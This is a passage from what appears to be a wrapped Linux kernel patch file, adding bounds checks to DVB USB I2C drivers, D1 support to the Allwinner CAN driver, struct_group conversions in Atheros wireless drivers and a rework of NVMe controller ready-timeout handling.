+ 			index = msgs[i].buf[0];
+ 			value = addr;
+diff --git a/drivers/media/usb/dvb-usb-v2/gl861.c b/drivers/media/usb/dvb-usb-v2/gl861.c
+index 0c434259c36f1..c71e7b93476de 100644
+--- a/drivers/media/usb/dvb-usb-v2/gl861.c
++++ b/drivers/media/usb/dvb-usb-v2/gl861.c
+@@ -120,7 +120,7 @@ static int gl861_i2c_master_xfer(struct i2c_adapter *adap, struct i2c_msg msg[],
+ 	} else if (num == 2 && !(msg[0].flags & I2C_M_RD) &&
+ 		   (msg[1].flags & I2C_M_RD)) {
+ 		/* I2C write + read */
+-		if (msg[0].len > 1 || msg[1].len > sizeof(ctx->buf)) {
++		if (msg[0].len != 1 || msg[1].len > sizeof(ctx->buf)) {
+ 			ret = -EOPNOTSUPP;
+ 			goto err;
+ 		}
+diff --git a/drivers/media/usb/dvb-usb/af9005.c b/drivers/media/usb/dvb-usb/af9005.c
+index 0827bf3d4e8c7..13604e6acdb83 100644
+--- a/drivers/media/usb/dvb-usb/af9005.c
++++ b/drivers/media/usb/dvb-usb/af9005.c
+@@ -422,6 +422,10 @@ static int af9005_i2c_xfer(struct i2c_adapter *adap, struct i2c_msg msg[],
+ 		if (ret == 0)
+ 			ret = 2;
+ 	} else {
++		if (msg[0].len < 2) {
++			ret = -EOPNOTSUPP;
++			goto unlock;
++		}
+ 		/* write one or more registers */
+ 		reg = msg[0].buf[0];
+ 		addr = msg[0].addr;
+@@ -431,6 +435,7 @@ static int af9005_i2c_xfer(struct i2c_adapter *adap, struct i2c_msg msg[],
+ 			ret = 1;
+ 	}
+ 
++unlock:
+ 	mutex_unlock(&d->i2c_mutex);
+ 	return ret;
+ }
+diff --git a/drivers/media/usb/dvb-usb/dw2102.c b/drivers/media/usb/dvb-usb/dw2102.c
+index 8747960e61461..356fc728d59a8 100644
+--- a/drivers/media/usb/dvb-usb/dw2102.c
++++ b/drivers/media/usb/dvb-usb/dw2102.c
+@@ -128,6 +128,10 @@ static int dw2102_i2c_transfer(struct i2c_adapter *adap, struct i2c_msg msg[],
+ 
+ 	switch (num) {
+ 	case 2:
++		if (msg[0].len < 1) {
++			num = -EOPNOTSUPP;
++			break;
++		}
+ 		/* read stv0299 register */
+ 		value = msg[0].buf[0];/* register */
+ 		for (i = 0; i < msg[1].len; i++) {
+@@ -139,6 +143,10 @@ static int dw2102_i2c_transfer(struct i2c_adapter *adap, struct i2c_msg msg[],
+ 	case 1:
+ 		switch (msg[0].addr) {
+ 		case 0x68:
++			if (msg[0].len < 2) {
++				num = -EOPNOTSUPP;
++				break;
++			}
+ 			/* write to stv0299 register */
+ 			buf6[0] = 0x2a;
+ 			buf6[1] = msg[0].buf[0];
+@@ -148,6 +156,10 @@ static int dw2102_i2c_transfer(struct i2c_adapter *adap, struct i2c_msg msg[],
+ 			break;
+ 		case 0x60:
+ 			if (msg[0].flags == 0) {
++				if (msg[0].len < 4) {
++					num = -EOPNOTSUPP;
++					break;
++				}
+ 			/* write to tuner pll */
+ 				buf6[0] = 0x2c;
+ 				buf6[1] = 5;
+@@ -159,6 +171,10 @@ static int dw2102_i2c_transfer(struct i2c_adapter *adap, struct i2c_msg msg[],
+ 				dw210x_op_rw(d->udev, 0xb2, 0, 0,
+ 						buf6, 7, DW210X_WRITE_MSG);
+ 			} else {
++				if (msg[0].len < 1) {
++					num = -EOPNOTSUPP;
++					break;
++				}
+ 			/* read from tuner */
+ 				dw210x_op_rw(d->udev, 0xb5, 0, 0,
+ 						buf6, 1, DW210X_READ_MSG);
+@@ -166,12 +182,20 @@ static int dw2102_i2c_transfer(struct i2c_adapter *adap, struct i2c_msg msg[],
+ 			}
+ 			break;
+ 		case (DW2102_RC_QUERY):
++			if (msg[0].len < 2) {
++				num = -EOPNOTSUPP;
++				break;
++			}
+ 			dw210x_op_rw(d->udev, 0xb8, 0, 0,
+ 					buf6, 2, DW210X_READ_MSG);
+ 			msg[0].buf[0] = buf6[0];
+ 			msg[0].buf[1] = buf6[1];
+ 			break;
+ 		case (DW2102_VOLTAGE_CTRL):
++			if (msg[0].len < 1) {
++				num = -EOPNOTSUPP;
++				break;
++			}
+ 			buf6[0] = 0x30;
+ 			buf6[1] = msg[0].buf[0];
+ 			dw210x_op_rw(d->udev, 0xb2, 0, 0,
+diff --git a/drivers/misc/Kconfig b/drivers/misc/Kconfig
+index 358ad56f65245..0cef98319f0e5 100644
+--- a/drivers/misc/Kconfig
++++ b/drivers/misc/Kconfig
+@@ -474,6 +474,7 @@ config HISI_HIKEY_USB
+ config OPEN_DICE
+ 	tristate "Open Profile for DICE driver"
+ 	depends on OF_RESERVED_MEM
++	depends on HAS_IOMEM
+ 	help
+ 	  This driver exposes a DICE reserved memory region to userspace via
+ 	  a character device. The memory region contains Compound Device
+diff --git a/drivers/misc/fastrpc.c b/drivers/misc/fastrpc.c
+index 13518cac076c7..4c51d216f3d43 100644
+--- a/drivers/misc/fastrpc.c
++++ b/drivers/misc/fastrpc.c
+@@ -310,8 +310,8 @@ static void fastrpc_free_map(struct kref *ref)
+ 				return;
+ 			}
+ 		}
+-		dma_buf_unmap_attachment(map->attach, map->table,
+-					 DMA_BIDIRECTIONAL);
++		dma_buf_unmap_attachment_unlocked(map->attach, map->table,
++						  DMA_BIDIRECTIONAL);
+ 		dma_buf_detach(map->buf, map->attach);
+ 		dma_buf_put(map->buf);
+ 	}
+@@ -711,6 +711,7 @@ static int fastrpc_map_create(struct fastrpc_user *fl, int fd,
+ {
+ 	struct fastrpc_session_ctx *sess = fl->sctx;
+ 	struct fastrpc_map *map = NULL;
++	struct sg_table *table;
+ 	int err = 0;
+ 
+ 	if (!fastrpc_map_lookup(fl, fd, ppmap, true))
+@@ -736,11 +737,12 @@ static int fastrpc_map_create(struct fastrpc_user *fl, int fd,
+ 		goto attach_err;
+ 	}
+ 
+-	map->table = dma_buf_map_attachment(map->attach, DMA_BIDIRECTIONAL);
+-	if (IS_ERR(map->table)) {
+-		err = PTR_ERR(map->table);
++	table = dma_buf_map_attachment_unlocked(map->attach, DMA_BIDIRECTIONAL);
++	if (IS_ERR(table)) {
++		err = PTR_ERR(table);
+ 		goto map_err;
+ 	}
++	map->table = table;
+ 
+ 	map->phys = sg_dma_address(map->table->sgl);
+ 	map->phys += ((u64)fl->sctx->sid << 32);
+diff --git a/drivers/mmc/host/sdhci-esdhc-imx.c b/drivers/mmc/host/sdhci-esdhc-imx.c
+index b63cf1f9e8fb9..3c7b32c0d3f3f 100644
+--- a/drivers/mmc/host/sdhci-esdhc-imx.c
++++ b/drivers/mmc/host/sdhci-esdhc-imx.c
+@@ -171,8 +171,8 @@
+ #define ESDHC_FLAG_HS400		BIT(9)
+ /*
+  * The IP has errata ERR010450
+- * uSDHC: Due to the I/O timing limit, for SDR mode, SD card clock can't
+- * exceed 150MHz, for DDR mode, SD card clock can't exceed 45MHz.
++ * uSDHC: At 1.8V due to the I/O timing limit, for SDR mode, SD card
++ * clock can't exceed 150MHz, for DDR mode, SD card clock can't exceed 45MHz.
+  */
+ #define ESDHC_FLAG_ERR010450		BIT(10)
+ /* The IP supports HS400ES mode */
+@@ -932,7 +932,8 @@ static inline void esdhc_pltfm_set_clock(struct sdhci_host *host,
+ 		| ESDHC_CLOCK_MASK);
+ 	sdhci_writel(host, temp, ESDHC_SYSTEM_CONTROL);
+ 
+-	if (imx_data->socdata->flags & ESDHC_FLAG_ERR010450) {
++	if ((imx_data->socdata->flags & ESDHC_FLAG_ERR010450) &&
++	    (!(host->quirks2 & SDHCI_QUIRK2_NO_1_8_V))) {
+ 		unsigned int max_clock;
+ 
+ 		max_clock = imx_data->is_ddr ? 45000000 : 150000000;
+diff --git a/drivers/net/can/Kconfig b/drivers/net/can/Kconfig
+index 3048ad77edb35..8236aabebb394 100644
+--- a/drivers/net/can/Kconfig
++++ b/drivers/net/can/Kconfig
+@@ -174,10 +174,10 @@ config CAN_SLCAN
+ 
+ config CAN_SUN4I
+ 	tristate "Allwinner A10 CAN controller"
+-	depends on MACH_SUN4I || MACH_SUN7I || COMPILE_TEST
++	depends on MACH_SUN4I || MACH_SUN7I || RISCV || COMPILE_TEST
+ 	help
+ 	  Say Y here if you want to use CAN controller found on Allwinner
+-	  A10/A20 SoCs.
++	  A10/A20/D1 SoCs.
+ 
+ 	  To compile this driver as a module, choose M here: the module will
+ 	  be called sun4i_can.
+diff --git a/drivers/net/can/sun4i_can.c b/drivers/net/can/sun4i_can.c
+index 2b78f9197681b..c3a6b028ea4d6 100644
+--- a/drivers/net/can/sun4i_can.c
++++ b/drivers/net/can/sun4i_can.c
+@@ -91,6 +91,8 @@
+ #define SUN4I_REG_BUF12_ADDR	0x0070	/* CAN Tx/Rx Buffer 12 */
+ #define SUN4I_REG_ACPC_ADDR	0x0040	/* CAN Acceptance Code 0 */
+ #define SUN4I_REG_ACPM_ADDR	0x0044	/* CAN Acceptance Mask 0 */
++#define SUN4I_REG_ACPC_ADDR_D1	0x0028	/* CAN Acceptance Code 0 on the D1 */
++#define SUN4I_REG_ACPM_ADDR_D1	0x002C	/* CAN Acceptance Mask 0 on the D1 */
+ #define SUN4I_REG_RBUF_RBACK_START_ADDR	0x0180	/* CAN transmit buffer start */
+ #define SUN4I_REG_RBUF_RBACK_END_ADDR	0x01b0	/* CAN transmit buffer end */
+ 
+@@ -205,9 +207,11 @@
+  * struct sun4ican_quirks - Differences between SoC variants.
+  *
+  * @has_reset: SoC needs reset deasserted.
++ * @acp_offset: Offset of ACPC and ACPM registers
+  */
+ struct sun4ican_quirks {
+ 	bool has_reset;
++	int acp_offset;
+ };
+ 
+ struct sun4ican_priv {
+@@ -216,6 +220,7 @@ struct sun4ican_priv {
+ 	struct clk *clk;
+ 	struct reset_control *reset;
+ 	spinlock_t cmdreg_lock;	/* lock for concurrent cmd register writes */
++	int acp_offset;
+ };
+ 
+ static const struct can_bittiming_const sun4ican_bittiming_const = {
+@@ -338,8 +343,8 @@ static int sun4i_can_start(struct net_device *dev)
+ 	}
+ 
+ 	/* set filters - we accept all */
+-	writel(0x00000000, priv->base + SUN4I_REG_ACPC_ADDR);
+-	writel(0xFFFFFFFF, priv->base + SUN4I_REG_ACPM_ADDR);
++	writel(0x00000000, priv->base + SUN4I_REG_ACPC_ADDR + priv->acp_offset);
++	writel(0xFFFFFFFF, priv->base + SUN4I_REG_ACPM_ADDR + priv->acp_offset);
+ 
+ 	/* clear error counters and error code capture */
+ 	writel(0, priv->base + SUN4I_REG_ERRC_ADDR);
+@@ -768,10 +773,17 @@ static const struct ethtool_ops sun4ican_ethtool_ops = {
+ 
+ static const struct sun4ican_quirks sun4ican_quirks_a10 = {
+ 	.has_reset = false,
++	.acp_offset = 0,
+ };
+ 
+ static const struct sun4ican_quirks sun4ican_quirks_r40 = {
+ 	.has_reset = true,
++	.acp_offset = 0,
++};
++
++static const struct sun4ican_quirks sun4ican_quirks_d1 = {
++	.has_reset = true,
++	.acp_offset = (SUN4I_REG_ACPC_ADDR_D1 - SUN4I_REG_ACPC_ADDR),
+ };
+ 
+ static const struct of_device_id sun4ican_of_match[] = {
+@@ -784,6 +796,9 @@ static const struct of_device_id sun4ican_of_match[] = {
+ 	}, {
+ 		.compatible = "allwinner,sun8i-r40-can",
+ 		.data = &sun4ican_quirks_r40
++	}, {
++		.compatible = "allwinner,sun20i-d1-can",
++		.data = &sun4ican_quirks_d1
+ 	}, {
+ 		/* sentinel */
+ 	},
+@@ -872,6 +887,7 @@ static int sun4ican_probe(struct platform_device *pdev)
+ 	priv->base = addr;
+ 	priv->clk = clk;
+ 	priv->reset = reset;
++	priv->acp_offset = quirks->acp_offset;
+ 	spin_lock_init(&priv->cmdreg_lock);
+ 
+ 	platform_set_drvdata(pdev, dev);
+@@ -909,4 +925,4 @@ module_platform_driver(sun4i_can_driver);
+ MODULE_AUTHOR("Peter Chen <xingkongcp@gmail.com>");
+ MODULE_AUTHOR("Gerhard Bertelsmann <info@gerhard-bertelsmann.de>");
+ MODULE_LICENSE("Dual BSD/GPL");
+-MODULE_DESCRIPTION("CAN driver for Allwinner SoCs (A10/A20)");
++MODULE_DESCRIPTION("CAN driver for Allwinner SoCs (A10/A20/D1)");
+diff --git a/drivers/net/ethernet/atheros/alx/ethtool.c b/drivers/net/ethernet/atheros/alx/ethtool.c
+index b716adacd8159..7f6b69a523676 100644
+--- a/drivers/net/ethernet/atheros/alx/ethtool.c
++++ b/drivers/net/ethernet/atheros/alx/ethtool.c
+@@ -292,9 +292,8 @@ static void alx_get_ethtool_stats(struct net_device *netdev,
+ 	spin_lock(&alx->stats_lock);
+ 
+ 	alx_update_hw_stats(hw);
+-	BUILD_BUG_ON(sizeof(hw->stats) - offsetof(struct alx_hw_stats, rx_ok) <
+-		     ALX_NUM_STATS * sizeof(u64));
+-	memcpy(data, &hw->stats.rx_ok, ALX_NUM_STATS * sizeof(u64));
++	BUILD_BUG_ON(sizeof(hw->stats) != ALX_NUM_STATS * sizeof(u64));
++	memcpy(data, &hw->stats, sizeof(hw->stats));
+ 
+ 	spin_unlock(&alx->stats_lock);
+ }
+diff --git a/drivers/net/ethernet/intel/ice/ice_eswitch.c b/drivers/net/ethernet/intel/ice/ice_eswitch.c
+index 2ffe5708a045b..7de4a8a4b563c 100644
+--- a/drivers/net/ethernet/intel/ice/ice_eswitch.c
++++ b/drivers/net/ethernet/intel/ice/ice_eswitch.c
+@@ -361,6 +361,9 @@ ice_eswitch_port_start_xmit(struct sk_buff *skb, struct net_device *netdev)
+ 	np = netdev_priv(netdev);
+ 	vsi = np->vsi;
+ 
++	if (!vsi || !ice_is_switchdev_running(vsi->back))
++		return NETDEV_TX_BUSY;
++
+ 	if (ice_is_reset_in_progress(vsi->back->state) ||
+ 	    test_bit(ICE_VF_DIS, vsi->back->state))
+ 		return NETDEV_TX_BUSY;
+diff --git a/drivers/net/wireless/ath/ath9k/ahb.c b/drivers/net/wireless/ath/ath9k/ahb.c
+index 9cd12b20b18d8..9bfaadfa6c009 100644
+--- a/drivers/net/wireless/ath/ath9k/ahb.c
++++ b/drivers/net/wireless/ath/ath9k/ahb.c
+@@ -132,8 +132,8 @@ static int ath_ahb_probe(struct platform_device *pdev)
+ 
+ 	ah = sc->sc_ah;
+ 	ath9k_hw_name(ah, hw_name, sizeof(hw_name));
+-	wiphy_info(hw->wiphy, "%s mem=0x%lx, irq=%d\n",
+-		   hw_name, (unsigned long)mem, irq);
++	wiphy_info(hw->wiphy, "%s mem=0x%p, irq=%d\n",
++		   hw_name, mem, irq);
+ 
+ 	return 0;
+ 
+diff --git a/drivers/net/wireless/ath/ath9k/mac.h b/drivers/net/wireless/ath/ath9k/mac.h
+index af44b33814ddc..f03d792732da7 100644
+--- a/drivers/net/wireless/ath/ath9k/mac.h
++++ b/drivers/net/wireless/ath/ath9k/mac.h
+@@ -115,8 +115,10 @@ struct ath_tx_status {
+ 	u8 qid;
+ 	u16 desc_id;
+ 	u8 tid;
+-	u32 ba_low;
+-	u32 ba_high;
++	struct_group(ba,
++		u32 ba_low;
++		u32 ba_high;
++	);
+ 	u32 evm0;
+ 	u32 evm1;
+ 	u32 evm2;
+diff --git a/drivers/net/wireless/ath/ath9k/pci.c b/drivers/net/wireless/ath/ath9k/pci.c
+index a074e23013c58..f0e3901e8182a 100644
+--- a/drivers/net/wireless/ath/ath9k/pci.c
++++ b/drivers/net/wireless/ath/ath9k/pci.c
+@@ -988,8 +988,8 @@ static int ath_pci_probe(struct pci_dev *pdev, const struct pci_device_id *id)
+ 	sc->sc_ah->msi_reg = 0;
+ 
+ 	ath9k_hw_name(sc->sc_ah, hw_name, sizeof(hw_name));
+-	wiphy_info(hw->wiphy, "%s mem=0x%lx, irq=%d\n",
+-		   hw_name, (unsigned long)sc->mem, pdev->irq);
++	wiphy_info(hw->wiphy, "%s mem=0x%p, irq=%d\n",
++		   hw_name, sc->mem, pdev->irq);
+ 
+ 	return 0;
+ 
+diff --git a/drivers/net/wireless/ath/ath9k/xmit.c b/drivers/net/wireless/ath/ath9k/xmit.c
+index ba271a10d4ab1..eeabdd67fbccd 100644
+--- a/drivers/net/wireless/ath/ath9k/xmit.c
++++ b/drivers/net/wireless/ath/ath9k/xmit.c
+@@ -462,7 +462,7 @@ static void ath_tx_count_frames(struct ath_softc *sc, struct ath_buf *bf,
+ 	isaggr = bf_isaggr(bf);
+ 	if (isaggr) {
+ 		seq_st = ts->ts_seqnum;
+-		memcpy(ba, &ts->ba_low, WME_BA_BMP_SIZE >> 3);
++		memcpy(ba, &ts->ba, WME_BA_BMP_SIZE >> 3);
+ 	}
+ 
+ 	while (bf) {
+@@ -545,7 +545,7 @@ static void ath_tx_complete_aggr(struct ath_softc *sc, struct ath_txq *txq,
+ 	if (isaggr && txok) {
+ 		if (ts->ts_flags & ATH9K_TX_BA) {
+ 			seq_st = ts->ts_seqnum;
+-			memcpy(ba, &ts->ba_low, WME_BA_BMP_SIZE >> 3);
++			memcpy(ba, &ts->ba, WME_BA_BMP_SIZE >> 3);
+ 		} else {
+ 			/*
+ 			 * AR5416 can become deaf/mute when BA
+diff --git a/drivers/net/wireless/ath/wil6210/txrx.c b/drivers/net/wireless/ath/wil6210/txrx.c
+index 237cbd5c5060b..f29ac6de71399 100644
+--- a/drivers/net/wireless/ath/wil6210/txrx.c
++++ b/drivers/net/wireless/ath/wil6210/txrx.c
+@@ -666,7 +666,7 @@ static int wil_rx_crypto_check(struct wil6210_priv *wil, struct sk_buff *skb)
+ 	struct wil_tid_crypto_rx *c = mc ? &s->group_crypto_rx :
+ 				      &s->tid_crypto_rx[tid];
+ 	struct wil_tid_crypto_rx_single *cc = &c->key_id[key_id];
+-	const u8 *pn = (u8 *)&d->mac.pn_15_0;
++	const u8 *pn = (u8 *)&d->mac.pn;
+ 
+ 	if (!cc->key_set) {
+ 		wil_err_ratelimited(wil,
+diff --git a/drivers/net/wireless/ath/wil6210/txrx.h b/drivers/net/wireless/ath/wil6210/txrx.h
+index 1ae1bec1b97f1..689f68d89a440 100644
+--- a/drivers/net/wireless/ath/wil6210/txrx.h
++++ b/drivers/net/wireless/ath/wil6210/txrx.h
+@@ -343,8 +343,10 @@ struct vring_rx_mac {
+ 	u32 d0;
+ 	u32 d1;
+ 	u16 w4;
+-	u16 pn_15_0;
+-	u32 pn_47_16;
++	struct_group_attr(pn, __packed,
++		u16 pn_15_0;
++		u32 pn_47_16;
++	);
+ } __packed;
+ 
+ /* Rx descriptor - DMA part
+diff --git a/drivers/net/wireless/ath/wil6210/txrx_edma.c b/drivers/net/wireless/ath/wil6210/txrx_edma.c
+index 201c8c35e0c9e..1ba1f21ebea26 100644
+--- a/drivers/net/wireless/ath/wil6210/txrx_edma.c
++++ b/drivers/net/wireless/ath/wil6210/txrx_edma.c
+@@ -548,7 +548,7 @@ static int wil_rx_crypto_check_edma(struct wil6210_priv *wil,
+ 	s = &wil->sta[cid];
+ 	c = mc ? &s->group_crypto_rx : &s->tid_crypto_rx[tid];
+ 	cc = &c->key_id[key_id];
+-	pn = (u8 *)&st->ext.pn_15_0;
++	pn = (u8 *)&st->ext.pn;
+ 
+ 	if (!cc->key_set) {
+ 		wil_err_ratelimited(wil,
+diff --git a/drivers/net/wireless/ath/wil6210/txrx_edma.h b/drivers/net/wireless/ath/wil6210/txrx_edma.h
+index c736f7413a35f..ee90e225bb050 100644
+--- a/drivers/net/wireless/ath/wil6210/txrx_edma.h
++++ b/drivers/net/wireless/ath/wil6210/txrx_edma.h
+@@ -330,8 +330,10 @@ struct wil_rx_status_extension {
+ 	u32 d0;
+ 	u32 d1;
+ 	__le16 seq_num; /* only lower 12 bits */
+-	u16 pn_15_0;
+-	u32 pn_47_16;
++	struct_group_attr(pn, __packed,
++		u16 pn_15_0;
++		u32 pn_47_16;
++	);
+ } __packed;
+ 
+ struct wil_rx_status_extended {
+diff --git a/drivers/net/wireless/mac80211_hwsim.c b/drivers/net/wireless/mac80211_hwsim.c
+index da5c355405f68..db70cef854bc4 100644
+--- a/drivers/net/wireless/mac80211_hwsim.c
++++ b/drivers/net/wireless/mac80211_hwsim.c
+@@ -4906,14 +4906,15 @@ static int hwsim_cloned_frame_received_nl(struct sk_buff *skb_2,
+ 	frame_data_len = nla_len(info->attrs[HWSIM_ATTR_FRAME]);
+ 	frame_data = (void *)nla_data(info->attrs[HWSIM_ATTR_FRAME]);
+ 
++	if (frame_data_len < sizeof(struct ieee80211_hdr_3addr) ||
++	    frame_data_len > IEEE80211_MAX_DATA_LEN)
++		goto err;
++
+ 	/* Allocate new skb here */
+ 	skb = alloc_skb(frame_data_len, GFP_KERNEL);
+ 	if (skb == NULL)
+ 		goto err;
+ 
+-	if (frame_data_len > IEEE80211_MAX_DATA_LEN)
+-		goto err;
+-
+ 	/* Copy the data */
+ 	skb_put_data(skb, frame_data, frame_data_len);
+ 
+diff --git a/drivers/net/wireless/marvell/mwifiex/tdls.c b/drivers/net/wireless/marvell/mwifiex/tdls.c
+index 97bb87c3676bb..6c60621b6cccb 100644
+--- a/drivers/net/wireless/marvell/mwifiex/tdls.c
++++ b/drivers/net/wireless/marvell/mwifiex/tdls.c
+@@ -735,6 +735,7 @@ mwifiex_construct_tdls_action_frame(struct mwifiex_private *priv,
+ 	int ret;
+ 	u16 capab;
+ 	struct ieee80211_ht_cap *ht_cap;
++	unsigned int extra;
+ 	u8 radio, *pos;
+ 
+ 	capab = priv->curr_bss_params.bss_descriptor.cap_info_bitmap;
+@@ -753,7 +754,10 @@ mwifiex_construct_tdls_action_frame(struct mwifiex_private *priv,
+ 
+ 	switch (action_code) {
+ 	case WLAN_PUB_ACTION_TDLS_DISCOVER_RES:
+-		skb_put(skb, sizeof(mgmt->u.action.u.tdls_discover_resp) + 1);
++		/* See the layout of 'struct ieee80211_mgmt'. */
++		extra = sizeof(mgmt->u.action.u.tdls_discover_resp) +
++			sizeof(mgmt->u.action.category);
++		skb_put(skb, extra);
+ 		mgmt->u.action.category = WLAN_CATEGORY_PUBLIC;
+ 		mgmt->u.action.u.tdls_discover_resp.action_code =
+ 					      WLAN_PUB_ACTION_TDLS_DISCOVER_RES;
+@@ -762,8 +766,7 @@ mwifiex_construct_tdls_action_frame(struct mwifiex_private *priv,
+ 		mgmt->u.action.u.tdls_discover_resp.capability =
+ 							     cpu_to_le16(capab);
+ 		/* move back for addr4 */
+-		memmove(pos + ETH_ALEN, &mgmt->u.action.category,
+-			sizeof(mgmt->u.action.u.tdls_discover_resp));
++		memmove(pos + ETH_ALEN, &mgmt->u.action, extra);
+ 		/* init address 4 */
+ 		eth_broadcast_addr(pos);
+ 
+diff --git a/drivers/net/wireless/mediatek/mt76/mt7921/mac.c b/drivers/net/wireless/mediatek/mt76/mt7921/mac.c
+index 1c0d8cf19b8eb..49ddca84f7862 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt7921/mac.c
++++ b/drivers/net/wireless/mediatek/mt76/mt7921/mac.c
+@@ -1167,6 +1167,10 @@ int mt7921_usb_sdio_tx_prepare_skb(struct mt76_dev *mdev, void *txwi_ptr,
+ 	if (unlikely(tx_info->skb->len <= ETH_HLEN))
+ 		return -EINVAL;
+ 
++	err = skb_cow_head(skb, MT_SDIO_TXD_SIZE + MT_SDIO_HDR_SIZE);
++	if (err)
++		return err;
++
+ 	if (!wcid)
+ 		wcid = &dev->mt76.global_wcid;
+ 
+diff --git a/drivers/nvme/host/core.c b/drivers/nvme/host/core.c
+index fd73db8a535d8..25ddfabc58f73 100644
+--- a/drivers/nvme/host/core.c
++++ b/drivers/nvme/host/core.c
+@@ -2368,25 +2368,8 @@ int nvme_enable_ctrl(struct nvme_ctrl *ctrl)
+ 	else
+ 		ctrl->ctrl_config = NVME_CC_CSS_NVM;
+ 
+-	if (ctrl->cap & NVME_CAP_CRMS_CRWMS) {
+-		u32 crto;
+-
+-		ret = ctrl->ops->reg_read32(ctrl, NVME_REG_CRTO, &crto);
+-		if (ret) {
+-			dev_err(ctrl->device, "Reading CRTO failed (%d)\n",
+-				ret);
+-			return ret;
+-		}
+-
+-		if (ctrl->cap & NVME_CAP_CRMS_CRIMS) {
+-			ctrl->ctrl_config |= NVME_CC_CRIME;
+-			timeout = NVME_CRTO_CRIMT(crto);
+-		} else {
+-			timeout = NVME_CRTO_CRWMT(crto);
+-		}
+-	} else {
+-		timeout = NVME_CAP_TIMEOUT(ctrl->cap);
+-	}
++	if (ctrl->cap & NVME_CAP_CRMS_CRWMS && ctrl->cap & NVME_CAP_CRMS_CRIMS)
++		ctrl->ctrl_config |= NVME_CC_CRIME;
+ 
+ 	ctrl->ctrl_config |= (NVME_CTRL_PAGE_SHIFT - 12) << NVME_CC_MPS_SHIFT;
+ 	ctrl->ctrl_config |= NVME_CC_AMS_RR | NVME_CC_SHN_NONE;
+@@ -2400,6 +2383,39 @@ int nvme_enable_ctrl(struct nvme_ctrl *ctrl)
+ 	if (ret)
+ 		return ret;
+ 
++	/* CAP value may change after initial CC write */
++	ret = ctrl->ops->reg_read64(ctrl, NVME_REG_CAP, &ctrl->cap);
++	if (ret)
++		return ret;
++
++	timeout = NVME_CAP_TIMEOUT(ctrl->cap);
++	if (ctrl->cap & NVME_CAP_CRMS_CRWMS) {
++		u32 crto, ready_timeout;
++
++		ret = ctrl->ops->reg_read32(ctrl, NVME_REG_CRTO, &crto);
++		if (ret) {
++			dev_err(ctrl->device, "Reading CRTO failed (%d)\n",
++				ret);
++			return ret;
++		}
++
++		/*
++		 * CRTO should always be greater or equal to CAP.TO, but some
++		 * devices are known to get this wrong. Use the larger of the
++		 * two values.
++		 */
++		if (ctrl->ctrl_config & NVME_CC_CRIME)
++			ready_timeout = NVME_CRTO_CRIMT(crto);
++		else
++			ready_timeout = NVME_CRTO_CRWMT(crto);
++
++		if (ready_timeout < timeout)
++			dev_warn_once(ctrl->device, "bad crto:%x cap:%llx\n",
++				      crto, ctrl->cap);
++		else
++			timeout = ready_timeout;
++	}
++
+ 	ctrl->ctrl_config |= NVME_CC_ENABLE;
+ 	ret = ctrl->ops->reg_write32(ctrl, NVME_REG_CC, ctrl->ctrl_config);
+ 	if (ret)
+diff --git a/drivers/nvme/target/io-cmd-file.c b/drivers/nvme/target/io-cmd-file.c
+index 871c4f32f443f..2d068439b129c 100644
+--- a/drivers/nvme/target/io-cmd-file.c
++++ b/drivers/nvme/target/io-cmd-file.c
+@@ -73,13 +73,6 @@ err:
+ 	return ret;
+ }
+ 
+-static void nvmet_file_init_bvec(struct bio_vec *bv, struct scatterlist *sg)
+-{
+-	bv->bv_page = sg_page(sg);
+-	bv->bv_offset = sg->offset;
+-	bv->bv_len = sg->length;
+-}
+-
+ static ssize_t nvmet_file_submit_bvec(struct nvmet_req *req, loff_t pos,
+ 		unsigned long nr_segs, size_t count, int ki_flags)
+ {
+@@ -146,7 +139,8 @@ static bool nvmet_file_execute_io(struct nvmet_req *req, int ki_flags)
+ 
+ 	memset(&req->f.iocb, 0, sizeof(struct kiocb));
+ 	for_each_sg(req->sg, sg, req->sg_cnt, i) {
+-		nvmet_file_init_bvec(&req->f.bvec[bv_cnt], sg);
++		bvec_set_page(&req->f.bvec[bv_cnt], sg_page(sg), sg->length,
++			      sg->offset);
+ 		len += req->f.bvec[bv_cnt].bv_len;
+ 		total_len += req->f.bvec[bv_cnt].bv_len;
+ 		bv_cnt++;
+diff --git a/drivers/nvme/target/tcp.c b/drivers/nvme/target/tcp.c
+index cc05c094de221..5e29da94f72d6 100644
+--- a/drivers/nvme/target/tcp.c
++++ b/drivers/nvme/target/tcp.c
+@@ -321,9 +321,8 @@ static void nvmet_tcp_build_pdu_iovec(struct nvmet_tcp_cmd *cmd)
+ 	while (length) {
+ 		u32 iov_len = min_t(u32, length, sg->length - sg_offset);
+ 
+-		iov->bv_page = sg_page(sg);
+-		iov->bv_len = sg->length;
+-		iov->bv_offset = sg->offset + sg_offset;
++		bvec_set_page(iov, sg_page(sg), iov_len,
++				sg->offset + sg_offset);
+ 
+ 		length -= iov_len;
+ 		sg = sg_next(sg);
+diff --git a/drivers/pci/controller/dwc/pci-imx6.c b/drivers/pci/controller/dwc/pci-imx6.c
+index 47db2d20568ef..388354a8e31cf 100644
+--- a/drivers/pci/controller/dwc/pci-imx6.c
++++ b/drivers/pci/controller/dwc/pci-imx6.c
+@@ -999,6 +999,7 @@ static void imx6_pcie_host_exit(struct dw_pcie_rp *pp)
+ 
+ static const struct dw_pcie_host_ops imx6_pcie_host_ops = {
+ 	.host_init = imx6_pcie_host_init,
++	.host_deinit = imx6_pcie_host_exit,
+ };
+ 
+ static const struct dw_pcie_ops dw_pcie_ops = {
+diff --git a/drivers/pci/controller/dwc/pcie-fu740.c b/drivers/pci/controller/dwc/pcie-fu740.c
+index 0c90583c078bf..1e9b44b8bba48 100644
+--- a/drivers/pci/controller/dwc/pcie-fu740.c
++++ b/drivers/pci/controller/dwc/pcie-fu740.c
+@@ -299,6 +299,7 @@ static int fu740_pcie_probe(struct platform_device *pdev)
+ 	pci->dev = dev;
+ 	pci->ops = &dw_pcie_ops;
+ 	pci->pp.ops = &fu740_pcie_host_ops;
++	pci->pp.num_vectors = MAX_MSI_IRQS;
+ 
+ 	/* SiFive specific region: mgmt */
+ 	afp->mgmt_base = devm_platform_ioremap_resource_byname(pdev, "mgmt");
+diff --git a/drivers/pci/controller/vmd.c b/drivers/pci/controller/vmd.c
+index d1eb17e3f1474..d4c9b888a79d7 100644
+--- a/drivers/pci/controller/vmd.c
++++ b/drivers/pci/controller/vmd.c
+@@ -526,8 +526,23 @@ static void vmd_domain_reset(struct vmd_dev *vmd)
+ 				     PCI_CLASS_BRIDGE_PCI))
+ 					continue;
+ 
+-				memset_io(base + PCI_IO_BASE, 0,
+-					  PCI_ROM_ADDRESS1 - PCI_IO_BASE);
